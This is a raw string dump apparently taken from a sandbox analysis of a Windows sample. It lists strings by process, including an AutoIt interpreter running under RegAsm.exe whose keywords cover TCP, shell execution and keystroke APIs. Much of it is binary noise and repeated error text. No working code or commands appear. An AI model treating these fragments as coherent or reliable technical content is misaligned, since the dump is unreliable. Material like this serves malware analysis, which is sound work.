Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.

0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.

Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.

Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.

3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.

Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.

String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

2.2.0.1

conhost.exe_1856:

.text

`.data

.rsrc

@.reloc

GDI32.dll

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-LocalRegistry-L1-1-0.dll

KERNEL32.dll

IMM32.dll

ole32.dll

OLEAUT32.dll

PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected

Invalid message 0x%x

InitExtendedEditKeys: Unsupported version number(%d)

Console init failed with status 0x%x

CreateWindowsWindow failed with status 0x%x, gle = 0x%x

InitWindowsStuff failed with status 0x%x (gle = 0x%x)

InitSideBySide failed create an activation context. Error: %d

GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.

GetModuleFileNameW failed %d.

Invalid EventType: 0x%x

Dup handle failed for %d of %d (Status = 0x%x)

Couldn't grow input buffer, Status == 0x%x

InitializeScrollBuffer failed, Status = 0x%x

CreateWindow failed with gle = 0x%x

Opening Font file failed with error 0x%x

\ega.cpi

NtReplyWaitReceivePort failed with Status 0x%x

ConsoleOpenWaitEvent failed with Status 0x%x

NtCreatePort failed with Status 0x%x

GetCharWidth32 failed with error 0x%x

GetTextMetricsW failed with error 0x%x

GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x

RtlStringCchCopy failed with Status 0x%x

Cannot allocate 0n%d bytes

|%SWj

O.fBf;

ReCreateDbcsScreenBuffer failed. Restoring to CP=%d

Invalid Parameter: 0x%x, 0x%x, 0x%x

ConsoleKeyInfo buffer is full

Invalid screen buffer size (0x%x, 0x%x)

SetROMFontCodePage: failed to memory allocation %d bytes

FONT.NT

Failed to set font image. wc=x, sz=(%x,%x)

Failed to set font image. wc=x sz=(%x, %x).

Failed to set font image. wc=x sz=(%x,%x)

FullscreenControlSetColors failed - Status = 0x%x

FullscreenControlSetPalette failed - Status = 0x%x

WriteCharsFromInput failed 0x%x

WriteCharsFromInput failed %x

RtlStringCchCopyW failed with Status 0x%x

CreateFontCache failed with Status 0x%x

FTPh

\>.Sj

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

GetKeyboardState

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

ActivateKeyboardLayout

GetKeyboardLayoutNameA

GetKeyboardLayoutNameW

_amsg_exit

_acmdln

ShipAssert

NtReplyWaitReceivePort

NtCreatePort

NtEnumerateValueKey

NtQueryValueKey

NtOpenKey

NtAcceptConnectPort

NtReplyPort

SetProcessShutdownParameters

GetCPInfo

conhost.pdb

%$%a%b%V%U%c%Q%W%]%\%[%

%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%

version="5.1.0.0"

name="Microsoft.Windows.ConsoleHost"

<requestedExecutionLevel

name="Microsoft.Windows.ConsoleHost.SystemDefault"

publicKeyToken="6595b64144ccf1df"

name="Microsoft.Windows.SystemCompatible"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

< =$>:>@>

2%2X2

%SystemRoot%

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen

WindowSize

ColorTableu

ExtendedEditkeyCustom

ExtendedEditKey

Software\Microsoft\Windows\CurrentVersion

\ !:=/.<>;|&

%d/%d

cmd.exe

desktop.ini

\console.dll

%d/%d

6.1.7601.17641 (win7sp1_gdr.110623-1503)

CONHOST.EXE

Windows

Operating System

6.1.7601.17641

%original file name%.exe_3584_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

nvvswc.exe_4084_rwx_69722000_00002000:

.ri3J

-yiq.yiw

-yiq.yi

RegAsm.exe_1676:

`.rsrc

SSh8*K

.hP6K

PSSSSSSh

Gt.Ht$

t.jGZf;

PSSShl

PVSShl

j.Zf;

;K|s%f

Jv.AKv

?#%X.y

GetProcessWindowStation

operator

kernel32.dll

oleaut32.dll

RegDeleteKeyExW

advapi32.dll

Error text not found (please report)

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is compiled without UTF support

PCRE does not support \L, \l, \N{name}, \U, or \u

support for \P, \p, and \X has not been compiled

this version of PCRE is not compiled with Unicode property support

\N is not supported in a class

zcÁ

GetProcessHeap

CreatePipe

GetWindowsDirectoryW

GetCPInfo

RegDeleteKeyW

RegEnumKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegCloseKey

SetViewportOrgEx

ShellExecuteExW

SHFileOperationW

ShellExecuteW

RegisterHotKey

GetKeyboardLayoutNameW

ExitWindowsEx

EnumThreadWindows

UnregisterHotKey

keybd_event

GetAsyncKeyState

SetKeyboardState

GetKeyboardState

GetKeyState

VkKeyScanW

EnumWindows

EnumChildWindows

MapVirtualKeyW

CloseWindowStation

SetProcessWindowStation

OpenWindowStationW

InternetCrackUrlW

HttpQueryInfoW

HttpOpenRequestW

HttpSendRequestW

FtpOpenFileW

FtpGetFileSize

InternetOpenUrlW

##@,&,//,))

.jQG2

3(-,'')-*/%'

9(***3).**-)'

H%d=j@

0!;....(

.text

`.rdata

@.data

.rsrc

@.reloc

_!0}129=

@.MfT

n..GGHHH

n...GGHHH

n ....HGHHHH

n  ....G.HHH

~~~~{~{{{{

n!! ....HGHHHH

n!!  .....HHHHHH

!!!  ....GGHHH

!!"".....HHHHnv

"""...-.nv

%SV@Gd

^hT%F

%uywu

.aO.$M

.Xap=

4[2Y%D

d}.HR

3-%Uo

..EeQ

y1W.xRV

.vttU

.%F:{

rWz.kS

<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>

<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

COMDLG32.dll

GDI32.dll

IPHLPAPI.DLL

MPR.dll

ole32.dll

OLEAUT32.dll

PSAPI.DLL

SHELL32.dll

USER32.dll

USERENV.dll

UxTheme.dll

VERSION.dll

WININET.dll

WINMM.dll

WSOCK32.dll

mscoree.dll

combase.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

>>>AUTOIT NO CMDEXECUTE<<<

CMDLINERAW

CMDLINE

/AutoIt3ExecuteLine

/AutoIt3ExecuteScript

APPSKEY

789:;<=>?

FTPSETPROXY

GUICTRLRECVMSG

GUICTRLSENDMSG

GUIGETMSG

GUIREGISTERMSG

HOTKEYSET

HTTPSETPROXY

HTTPSETUSERAGENT

ISKEYWORD

MSGBOX

REGENUMKEY

SHELLEXECUTE

SHELLEXECUTEWAIT

TCPACCEPT

TCPCLOSESOCKET

TCPCONNECT

TCPLISTEN

TCPNAMETOIP

TCPRECV

TCPSEND

TCPSHUTDOWN

TCPSTARTUP

TRAYGETMSG

UDPBIND

UDPCLOSESOCKET

UDPOPEN

UDPRECV

UDPSEND

UDPSHUTDOWN

UDPSTARTUP

SendKeyDelay

SendKeyDownDelay

TCPTimeout

WINDOWSDIR

AUTOITEXE

HOTKEYPRESSED

%s (%d) : ==> %s.:

Line %d:

Line %d (File "%s"):

%s (%d) : ==> %s:

AutoIt script files (*.au3, *.a3x)

*.au3;*.a3x

All files (*.*)

04090000

%u.%u.%u.%u

0.0.0.0

Mddddd

"%s" (%d) : ==> %s:

\??\%s

GUI_RUNDEFMSG

AUTOITCALLVARIABLE%d

255.255.255.255

Keyword

AUTOIT.ERROR

Null Object assignment in FOR..IN loop

Incorrect Object type in FOR..IN loop

3, 3, 12, 0

HKEY_LOCAL_MACHINE

HKEY_CLASSES_ROOT

HKEY_CURRENT_CONFIG

HKEY_CURRENT_USER

HKEY_USERS

%d/d/d

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

AutoIt supports the __stdcall (WINAPI) and __cdecl calling conventions. The __stdcall (WINAPI) convention is used by default but __cdecl can be used instead. See the DllCall() documentation for details on changing the calling convention.

Missing operator in expression."Unbalanced brackets in expression.

Error parsing function call.0Incorrect number of parameters in function call.'"ReDim" used without an array variable.>Illegal text at the end of statement (one statement per line).1"If" statement has no matching "EndIf" statement.1"Else" statement with no matching "If" statement.2"EndIf" statement with no matching "If" statement.7Too many "Else" statements for matching "If" statement.3"While" statement has no matching "Wend" statement.4"Wend" statement with no matching "While" statement.%Variable used without being declared.XArray variable has incorrect number of subscripts or subscript dimension range exceeded.#Variable subscript badly formatted.*Subscript used on non-accessible variable.&Too many subscripts used for an array.0Missing subscript dimensions in "Dim" statement.NNo variable given for "Dim", "Local", "Global", "Struct" or "Const" statement.

0Expected a "=" operator in assignment statement.*Invalid keyword at the start of this line.

Invalid element in a DllStruct.*Unknown option or bad parameter specified.&Unable to load the internet libraries./"Struct" statement has no matching "EndStruct".HUnable to open file, the maximum number of open files has been exceeded.K"ContinueLoop" statement with no matching "While", "Do" or "For" statement.

Invalid file filter given.*Expected a variable in user function call.1"Do" statement has no matching "Until" statement.2"Until" statement with no matching "Do" statement.#"For" statement is badly formatted.2"Next" statement with no matching "For" statement.N"ExitLoop/ContinueLoop" statements only valid from inside a For/Do/While loop.1"For" statement has no matching "Next" statement.@"Case" statement with no matching "Select"or "Switch" statement.:"EndSelect" statement with no matching "Select" statement.ORecursion level has been exceeded - AutoIt will quit to prevent stack overflow.&Cannot make existing variables static.4Cannot make static variables into regular variables.

3This keyword cannot be used after a "Then" keyword.>"Select" statement is missing "EndSelect" or "Case" statement. "If" statements must have a "Then" keyword. Badly formated Struct statement."Cannot assign values to constants..Cannot make existing variables into constants.9Only Object-type variables allowed in a "With" statement.v"long_ptr", "int_ptr" and "short_ptr" DllCall() types have been deprecated. Use "long*", "int*" and "short*" instead.-Object referenced outside a "With" statement.)Nested "With" statements are not allowed."Variable must be of type "Object".1The requested action with this object has failed.8Variable appears more than once in function declaration.2ReDim array can not be initialized in this manner.1An array variable can not be used in this manner.

Can not redeclare a constant.5Can not redeclare a parameter inside a user function.HCan pass constants by reference only to parameters with "Const" keyword.*Can not initialize a variable with itself.$Incorrect way to use this parameter.:"EndSwitch" statement with no matching "Switch" statement.>"Switch" statement is missing "EndSwitch" or "Case" statement.H"ContinueCase" statement with no matching "Select"or "Switch" statement.

String missing closing quote.!Badly formated variable or macro.*Missing separator character after keyword.

2.2.0.1

TrustedInstaller.exe_2956:

.text

`.data

.rsrc

@.reloc

ADVAPI32.dll

KERNEL32.dll

NTDLL.DLL

msvcrt.dll

ole32.dll

j.Yf;

Failed to execute shutdown processing.

FFailed a critical portion of startup processing.

Failed to initialize delayed portion.

TrustedInstaller terminated unexpectedly with pending operations the last time around; will skip core startup processing.

Failed to execute service.

Starting the Trusted Installer in standalone mode based on command-line switch: %S

Failed to expand path to servicing stack directory: %S

Failed to open servicing stack version registry key.

TI found cbscore.dll at: %S

Failed to initialize the DLL: %S

Failed to locate 'SfpInitialize' method in DLL: %S

Failed to load sfp DLL from path: %S

Failed to supply callback for revoking shutdown processing; assuming it is not supported.

Failed to initialize the Core DLL: %S

Warning: Failed to locate 'CbsCoreFinalizeShutdownProcessing' method in Core DLL: %S

Warning: Failed to locate 'CbsCorePrepareShutdownProcessing' method in Core DLL: %S

Warning: Failed to locate 'CbsCoreIsExecutionEngineIdle' method in Core DLL: %S

CbsCoreIsExecutionEngineIdle

Warning: Failed to locate 'CbsCoreUnregisterWinlogonNotification' method in Core DLL: %S

Warning: Failed to locate 'CbsCoreSetState' method in Core DLL: %S

Warning: Failed to locate 'CbsCoreServiceIdleProcessing' method in Core DLL: %S

Failed to locate 'CbsCoreFinalize' method in Core DLL: %S

Failed to locate 'CbsCoreShutdownProcessing' method in Core DLL: %S

Failed to locate 'CbsCoreEnsureNoStartupProcessing' method in Core DLL: %S

Failed to locate 'CbsCoreStartupProcessing' method in Core DLL: %S

Failed to locate 'CbsCoreInitializeDelayedPortion' method in Core DLL: %S

CbsCoreInitializeDelayedPortion

Failed to locate 'CbsCoreInitialize' method in Core DLL: %S

Failed to load Core DLL from path: %S

Failed to initialize sxsstore.dll

Failed to load SxsStore.dll

Failed to append dll name: %S to path: %S.

Failed to backslash-terminate system directory: %S.

May have successfully finished startup processing but another reboot and executing startup processing again is required to be sure.

Ignoring failure to set reboot callback; assuming reboot indication is not supported.

Failed to allocate string to format: %S

failed to allocate string to format: %S

Failed to get length of passed in string

Failed to get full path for string: %S

Failed to expand environment variables in string: %S

Failed to allocate string to enum registry value: %S

Registry value for %S is not a dword type.

%s [HRESULT = 0xx - %s]

Failed to open the registry root: n/a, key: %S.

Failed to query registry value: %S

Failed during startup processing, continuing with Trusted Installer execution

Warning: Failed to execute service idle processing. Error code: 0X%x

SSSh \S

Startup: Failed to wait on startup thread. Wait result: 0x%x

Failed to wait on startup thread. Wait result: 0x%x

Failed to wait on idle processing thread. Wait result: 0x%x

Warning: Failed while executing service idle processing.

Failed while executing shutdown processing.

Failed to open RebootPending key.

Reboot mark refs incremented to: %u

RebootPending key exists unexpectedly.

Failed to create RebootPending key.

Reboot mark refs: %u

Failed to delete RebootPending key.

Failed to open TrustedInstaller service to change config, hopefully the auto-start registry key is already set.

Failed to change the Trusted Installer to an auto start service, hopefully the auto-start registry key is already set.

Failed to locate setup log directory while executing during setup. Probably not really running under setup.

d:\w7rtm\base\cbs\util\cbsutil.cpp

Failed to allocate delete search string for backup logs directory path: %S

Failed to wait on makecab.exe process.

Failed to delete backup log after archiving: %S.

Failed to transfer cab timestamp: %S.

Failed to open handle for cab timestamp transfer: %S.

Archived backup log: %S.

Failed to allocate full path to makecab.exe.

Failed to ensure makecab.exe path ended with a backslash: %S.

Failed to allocate makecab.exe path from windows directory: %S.

Failed to get windows directory for makecab.exe path.

Failed to get proc address for ConstructPartialMsgVA.

ConstructPartialMsgVA

Could not allocate a backup name for the log file: %S, we'll just continue with our current log file.

Failed to initialize logging with dll: %S, log directory: %S

Failed to move log: %S to backup log: %S, continuing anyway.

Failed to add log name log directory: %S

Failed to store log path argument: %S

Failed to ensure that logging directory exists: %S

Failed to add 'servicing' name on to log directory: %S

Failed to ensure log directory ended with a backslash: %S

Failed to allocate log directory from windows directory: %S

Failed to get windows directory for log file.

Failed to initialize logging with DLL: %S, log file: %S

Failed to allocate log file name: %S

Failed to get proc address for WdsGenericSetupLogInit.

WdsGenericSetupLogInit

Failed to get proc address for WdsSetupLogInit.

WdsSetupLogInit

Failed to load WDSCORE DLL: %S

Could not load WDSCORE DLL from path: %S. Continuing without text file logging.

Failed to ensure Wds path ended with a backslash: %S

Failed to allocate Wds path from windows directory: %S

Failed to get windows directory for WDSCORE DLL path.

Failed to get attributes for file: %S

Failed to create path: %S

Failed to copy parent of path: %S

Cannot find parent for path: %S.

Failed to allocate string to read registry value: %S

Failed to query value to get type and size of registry root: n/a, value: %S

Failed initial query of value to get type, size, and value of registry value: %S

Failed to look up privilege name: %S

CERT_E_INVALID_NAME

CERT_E_INVALID_POLICY

CERT_E_UNTRUSTEDCA

CERT_E_WRONG_USAGE

CERT_E_CN_NO_MATCH

CERT_E_REVOCATION_FAILURE

CERT_E_UNTRUSTEDTESTROOT

CERT_E_REVOKED

CERT_E_CHAINING

CERT_E_UNTRUSTEDROOT

CERT_E_PATHLENCONST

CERT_E_CRITICAL

CERT_E_PURPOSE

CERT_E_ISSUERCHAINING

CERT_E_MALFORMED

CERT_E_ROLE

CERT_E_EXPIRED

CERT_E_VALIDITYPERIODNESTING

CRYPT_E_MISSING_PUBKEY_PARA

CRYPT_E_BAD_MSG

CRYPT_E_NO_DECRYPT_CERT

CRYPT_E_NO_KEY_PROPERTY

CRYPT_E_UNEXPECTED_MSG_TYPE

CRYPT_E_STREAM_MSG_NOT_READY

CRYPT_E_INVALID_MSG_TYPE

CRYPT_E_MSG_ERROR

CBS_E_SQM_REPORT_IGNORED_AI_FAILURES_ON_TRANSACTION_RESOLVE

CBS_E_INVALID_DRIVER_OPERATION_KEY

SPAPI_E_REMOTE_REQUEST_UNSUPPORTED

SPAPI_E_NON_WINDOWS_DRIVER

SPAPI_E_NON_WINDOWS_NT_DRIVER

SPAPI_E_KEY_DOES_NOT_EXIST

!"#$%&'()* ,-./0

ERROR_MCA_UNSUPPORTED_COLOR_TEMPERATURE

ERROR_MCA_UNSUPPORTED_MCCS_VERSION

ERROR_EVT_INVALID_OPERATION_OVER_ENABLED_DIRECT_CHANNEL

ERROR_EVT_FILTER_UNSUPPORTEDOP

ERROR_SXS_INCORRECT_PUBLIC_KEY_TOKEN

ERROR_SXS_PROTECTION_PUBLIC_KEY_TOO_SHORT

ERROR_SXS_KEY_NOT_FOUND

ERROR_IPSEC_IKE_CERT_CHAIN_POLICY_MISMATCH

ERROR_IPSEC_IKE_INVALID_CERT_KEYLEN

ERROR_IPSEC_IKE_UNSUPPORTED_ID

ERROR_IPSEC_IKE_ADD_UPDATE_KEY_FAILED

ERROR_IPSEC_IKE_NO_PEER_CERT

ERROR_IPSEC_IKE_PROCESS_ERR_CERT_REQ

ERROR_IPSEC_IKE_PROCESS_ERR_CERT

ERROR_IPSEC_IKE_NO_PUBLIC_KEY

ERROR_IPSEC_IKE_SIMULTANEOUS_REKEY

ERROR_IPSEC_IKE_NO_PRIVATE_KEY

ERROR_IPSEC_IKE_INVALID_CERT_TYPE

ERROR_IPSEC_IKE_INVALID_KEY_USAGE

ERROR_IPSEC_IKE_NO_CERT

ERROR_IPSEC_TRANSPORT_FILTER_PENDING_DELETION

ERROR_IPSEC_TRANSPORT_FILTER_NOT_FOUND

ERROR_IPSEC_TRANSPORT_FILTER_EXISTS

ERROR_NOT_SUPPORTED_ON_STANDARD_SERVER

ERROR_DS_NOT_SUPPORTED_SORT_ORDER

ERROR_DS_SAM_NEED_BOOTKEY_FLOPPY

ERROR_DS_SAM_NEED_BOOTKEY_PASSWORD

ERROR_DS_KEY_NOT_UNIQUE

ERROR_DS_ILLEGAL_XDOM_MOVE_OPERATION

ERROR_DS_PDC_OPERATION_IN_PROGRESS

ERROR_DS_DRA_NOT_SUPPORTED

ERROR_DS_UNKNOWN_OPERATION

ERROR_DS_ILLEGAL_MOD_OPERATION

ERROR_DS_NOT_SUPPORTED

ERROR_DS_AUTH_METHOD_NOT_SUPPORTED

ERROR_DS_OPERATIONS_ERROR

ERROR_OPERATION_NOT_SUPPORTED_IN_TRANSACTION

ERROR_CANNOT_EXECUTE_FILE_IN_TRANSACTION

ERROR_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE

ERROR_TRANSACTIONS_UNSUPPORTED_REMOTE

ERROR_IMPLICIT_TRANSACTION_NOT_SUPPORTED

ERROR_TRANSACTION_NOT_JOINED

ERROR_LOG_MULTIPLEXED

ERROR_CS_ENCRYPTION_UNSUPPORTED_SERVER

ERROR_EFS_VERSION_NOT_SUPPORT

ERROR_VOLUME_NOT_SUPPORT_EFS

ERROR_NOT_EXPORT_FORMAT

ERROR_NO_USER_KEYS

ERROR_CLUSTER_RESTYPE_NOT_SUPPORTED

ERROR_CLUSTER_JOIN_ABORTED

ERROR_INVALID_OPERATION_ON_QUORUM

ERROR_CLUSTER_JOIN_NOT_IN_PROGRESS

ERROR_CLUSTER_JOIN_IN_PROGRESS

ERROR_IEPORT_FULL

ERROR_NO_SUPPORTING_DRIVES

ERROR_CONTROLLING_IEPORT

ERROR_TRANSPORT_FULL

ERROR_UNABLE_TO_INVENTORY_TRANSPORT

ERROR_INVALID_OPERATION

RPC_S_INTERFACE_NOT_EXPORTED

RPC_S_NOT_ALL_OBJS_EXPORTED

RPC_X_PIPE_EMPTY

RPC_X_PIPE_DISCIPLINE_ERROR

RPC_X_PIPE_CLOSED

RPC_X_WRONG_PIPE_VERSION

RPC_X_WRONG_PIPE_ORDER

RPC_X_INVALID_PIPE_OBJECT

RPC_S_UNSUPPORTED_AUTHN_LEVEL

RPC_S_CANNOT_SUPPORT

RPC_S_NOT_ALL_OBJS_UNEXPORTED

RPC_S_NOTHING_TO_EXPORT

RPC_S_UNSUPPORTED_NAME_SYNTAX

RPC_S_UNSUPPORTED_TYPE

RPC_S_UNSUPPORTED_TRANS_SYN

RPC_S_PROTSEQ_NOT_SUPPORTED

ERROR_CONNECTED_OTHER_PASSWORD_DEFAULT

ERROR_CONNECTED_OTHER_PASSWORD

ERROR_CLIPPING_NOT_SUPPORTED

ERROR_TRANSFORM_NOT_SUPPORTED

ERROR_METAFILE_NOT_SUPPORTED

ERROR_PASSWORD_MUST_CHANGE

ERROR_UNKNOWN_PORT

ERROR_PATCH_REMOVAL_UNSUPPORTED

ERROR_PATCH_PACKAGE_UNSUPPORTED

ERROR_INSTALL_PLATFORM_UNSUPPORTED

ERROR_UNSUPPORTED_TYPE

ERROR_INSTALL_LANGUAGE_UNSUPPORTED

ERROR_SYMLINK_NOT_SUPPORTED

ERROR_REQUIRES_INTERACTIVE_WINDOWSTATION

ERROR_INVALID_KEYBOARD_HANDLE

ERROR_INVALID_MSGBOX_STYLE

ERROR_HOTKEY_NOT_REGISTERED

ERROR_CLASS_HAS_WINDOWS

ERROR_HOTKEY_ALREADY_REGISTERED

ERROR_NO_USER_SESSION_KEY

ERROR_PASSWORD_EXPIRED

ERROR_PASSWORD_RESTRICTION

ERROR_ILL_FORMED_PASSWORD

ERROR_WRONG_PASSWORD

ERROR_NULL_LM_PASSWORD

ERROR_LOCAL_USER_SESSION_KEY

ERROR_ACCESS_DISABLED_WEBBLADE_TAMPER

ERROR_ACCESS_DISABLED_WEBBLADE

ERROR_INVALID_IMPORT_OF_NON_DLL

ERROR_NOT_SUPPORTED_ON_SBS

ERROR_LOGIN_WKSTA_RESTRICTION

ERROR_LOGIN_TIME_RESTRICTION

ERROR_PORT_UNREACHABLE

ERROR_INVALID_PASSWORDNAME

ERROR_DISK_OPERATION_FAILED

ERROR_SERVICE_NOT_IN_EXE

ERROR_KEY_HAS_CHILDREN

ERROR_KEY_DELETED

ERROR_BADKEY

ERROR_OPERATION_ABORTED

ERROR_PRIMARY_TRANSPORT_CONNECT_FAILED

ERROR_CARDBUS_NOT_SUPPORTED

ERROR_IMAGE_MACHINE_TYPE_MISMATCH_EXE

ERROR_PORT_NOT_SET

ERROR_UNSUPPORTED_COMPRESSION

ERROR_PORT_MESSAGE_TOO_LONG

ERROR_INVALID_PORT_ATTRIBUTES

ERROR_PIPE_LISTENING

ERROR_PIPE_CONNECTED

ERROR_EAS_NOT_SUPPORTED

ERROR_PIPE_NOT_CONNECTED

ERROR_PIPE_BUSY

ERROR_BAD_PIPE

ERROR_PIPE_LOCAL

ERROR_EXE_CANNOT_MODIFY_STRONG_SIGNED_BINARY

ERROR_EXE_CANNOT_MODIFY_SIGNED_BINARY

ERROR_EXE_MACHINE_TYPE_MISMATCH

ERROR_BAD_EXE_FORMAT

ERROR_EXE_MARKED_INVALID

ERROR_INVALID_EXE_SIGNATURE

ERROR_ATOMIC_LOCKS_NOT_SUPPORTED

ERROR_IS_JOIN_PATH

ERROR_SUBST_TO_JOIN

ERROR_JOIN_TO_SUBST

ERROR_JOIN_TO_JOIN

ERROR_NOT_JOINED

ERROR_IS_JOINED

ERROR_IS_JOIN_TARGET

ERROR_BROKEN_PIPE

ERROR_INVALID_PASSWORD

ERROR_TOO_MANY_CMDS

ERROR_NOT_SUPPORTED

SL_E_VL_KEY_MANAGEMENT_SERVICE_VM_NOT_SUPPORTED

SL_E_OPERATION_NOT_ALLOWED

SL_E_SLP_OEM_CERT_MISSING

SL_E_PKEY_INVALID_UPGRADE

SL_E_BLOCKED_PRODUCT_KEY

SL_E_INVALID_PRODUCT_KEY

SL_E_VL_KEY_MANAGEMENT_SERVICE_ID_MISMATCH

SL_E_VL_KEY_MANAGEMENT_SERVICE_NOT_ACTIVATED

SL_E_VL_NOT_WINDOWS_SLP

SL_E_PRODUCT_KEY_INSTALLATION_NOT_ALLOWED

SL_E_CIDIID_VERSION_NOT_SUPPORTED

SL_E_PROXY_KEY_NOT_FOUND

SL_E_WINDOWS_INVALID_LICENSE_STATE

SL_E_LICENSE_SERVER_URL_NOT_FOUND

SL_E_NOT_SUPPORTED

SL_E_PKEY_NOT_INSTALLED

SL_E_INVALID_PKEY

SL_E_MISMATCHED_PKEY_RANGE

SL_E_PKEY_INVALID_KEYCHANGE2

SL_E_PKEY_INVALID_KEYCHANGE3

SL_E_PKEY_INVALID_KEYCHANGE4

SL_E_PKEY_INVALID_KEYCHANGE1

SL_E_PKEY_INTERNAL_ERROR

SL_E_PKEY_INVALID_ALGORITHM

SL_E_PKEY_INVALID_UNIQUEID

SL_E_PKEY_INVALID_CONFIG

SL_E_CHREF_PRODUCT_KEY_BINDING_MISMATCH

SL_E_CHREF_PRODUCT_KEY_POLICY_OVERLAPPED

SL_E_CHREF_INVALID_PRODUCT_KEY_UNIQUEID

SL_E_CHREF_PRODUCT_KEY_POLICY_MISSING

SL_E_CHREF_INVALID_PRODUCT_KEY_ALGORITHM

SL_E_CHPA_FAILED_TO_INSERT_PRODUCT_KEY_RECORD

SL_E_CHPA_FAILED_TO_UPDATE_PRODUCT_KEY_RECORD

SL_E_CHREF_INVALID_PRODUCT_KEY

SL_E_CHREF_EXCLUDED_PRODUCT_KEY

SL_E_CHREF_PRODUCT_KEY_REVOKED

SL_E_CHPA_PRODUCT_KEY_BEING_USED

SL_E_CHPA_FAILED_TO_DELETE_PRODUCTKEY_BINDING

SL_E_CHPA_FAILED_TO_PROCESS_PRODUCT_KEY_BINDINGS_XML

SL_E_CHPA_FAILED_TO_INSERT_PRODUCT_KEY_PROPERTY

SL_E_CHPA_FAILED_TO_UPDATE_PRODUCT_KEY_PROPERTY

SL_E_CHPA_FAILED_TO_DELETE_PRODUCT_KEY_PROPERTY

SL_E_CHPA_UNKNOWN_PRODUCT_KEY_TYPE

SL_E_CHPA_FAILED_TO_INSERT_PRODUCTKEY_BINDING

SL_E_CHPA_FAILED_TO_UPDATE_PRODUCTKEY_BINDING

SL_E_CHPA_TIMEBASED_PRODUCT_KEY_NOT_CONFIGURED

SL_E_CHPA_INVALID_PRODUCT_KEY_CHAR

SL_E_CHPA_INVALID_PRODUCT_KEY_FORMAT

SL_E_CHPA_INVALID_PRODUCT_KEY_LENGTH

SL_E_CHPA_UNSUPPORTED_PRODUCT_KEY

SL_E_CHPA_INVALID_PRODUCT_KEY

SL_E_CHPA_PRODUCT_KEY_BLOCKED

SL_E_CHPA_PRODUCT_KEY_OUT_OF_RANGE

SL_E_SRV_INVALID_PRODUCT_KEY_LICENSE

t.Ht!HHt

JET_wrnKeyChanged

JET_wrnUniqueKey

JET_errInvalidOperation

JET_errLanguageNotSupported

JET_errKeyDuplicate

JET_errKeyNotMade

JET_errKeyIsMade

JET_errColumnIndexed

JET_errIndexTuplesKeyTooSmall

JET_errTooManyOpenIndexes

JET_errIllegalOperation

JET_errNullKeyDisallowed

JET_errLinkNotSupported

JET_errTooManyKeys

JET_errTooManyIndexes

JET_errUnicodeNormalizationNotSupported

JET_errSectorSizeNotSupported

JET_errInvalidLoggedOperation

JET_errKeyTooBig

JET_errKeyTruncated

JET_errKeyBoundary

RegCloseKey

RegOpenKeyExW

RegOpenKeyW

RegCreateKeyExW

RegDeleteKeyW

GetWindowsDirectoryW

_amsg_exit

TrustedInstaller.pdb

9$9*979_9

=!=&= =4=

